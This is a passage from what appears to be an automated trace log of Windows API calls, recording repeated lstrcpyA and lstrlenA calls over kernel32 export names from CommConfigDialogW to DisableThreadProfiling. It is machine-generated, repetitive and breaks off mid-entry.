lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.125] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.125] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.125] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.125] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.125] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.125] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.125] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.125] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.126] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.126] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.126] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.126] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.126] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.126] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.126] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.126] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.126] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.126] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.126] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.126] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.126] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.126] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.126] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.126] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.126] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.126] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.126] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.126] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.126] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.126] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.126] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.126] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.126] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.126] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.126] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.126] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.126] lstrlenA (lpString="COPYFILEA") returned 9 [0083.126] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.126] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.126] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.126] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.126] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.126] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.126] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.126] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.127] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.127] lstrlenA (lpString="COPYFILEW") returned 9 [0083.127] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.127] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.127] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.127] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.127] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.127] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.127] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.127] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.127] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.127] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.127] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.127] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.127] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.127] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.127] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.127] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.127] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.127] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.127] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.127] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.127] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.127] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.127] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.127] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.127] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.127] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.127] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.127] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.127] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.127] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.127] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.127] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.127] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.127] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.127] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.127] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.128] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.128] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.128] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.128] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.128] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.128] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.128] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.128] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.128] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.128] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.128] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.128] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.128] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.128] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.128] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.128] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.128] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.128] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.128] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.128] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.128] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.128] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.128] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.128] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.128] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.128] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.128] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.128] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.128] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.128] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.128] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.128] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.128] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.128] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.128] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.128] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.128] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.129] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.129] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.129] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.129] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.129] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.129] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.129] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.129] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.129] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.129] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.129] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.129] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.129] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.129] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.129] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.129] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.129] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.129] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.129] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.129] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.129] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.129] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.129] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.129] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.129] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.129] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.129] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.129] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.129] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.129] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.129] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.129] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.130] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.130] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.130] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.130] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.130] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.130] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.130] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.130] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.130] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.130] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.130] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.130] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.130] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.130] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.130] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.130] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.130] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.130] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.130] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.130] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.130] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.130] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.130] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.130] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.130] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.130] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.130] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.130] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.130] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.130] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.130] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.130] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.130] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.130] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.130] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.130] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.130] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.131] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.131] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.131] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.131] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.131] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.131] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.131] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.131] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.131] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.131] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.131] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.131] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.131] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.131] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.131] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.131] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.131] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.131] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.131] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.131] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.131] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.131] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.131] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.131] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.131] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.131] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.131] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.131] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.131] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.131] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.131] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.131] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.131] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.131] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.131] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.131] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.131] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.132] lstrlenA (lpString="DELETEATOM") returned 10 [0083.132] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.132] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.132] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.132] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.132] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.132] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.132] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.132] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.132] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.132] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.132] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.132] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.132] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.132] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.132] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.132] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.132] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.132] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.132] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.132] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.132] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.132] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.132] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.132] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.132] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.132] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.132] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.132] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.132] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.132] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.132] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.132] lstrlenA 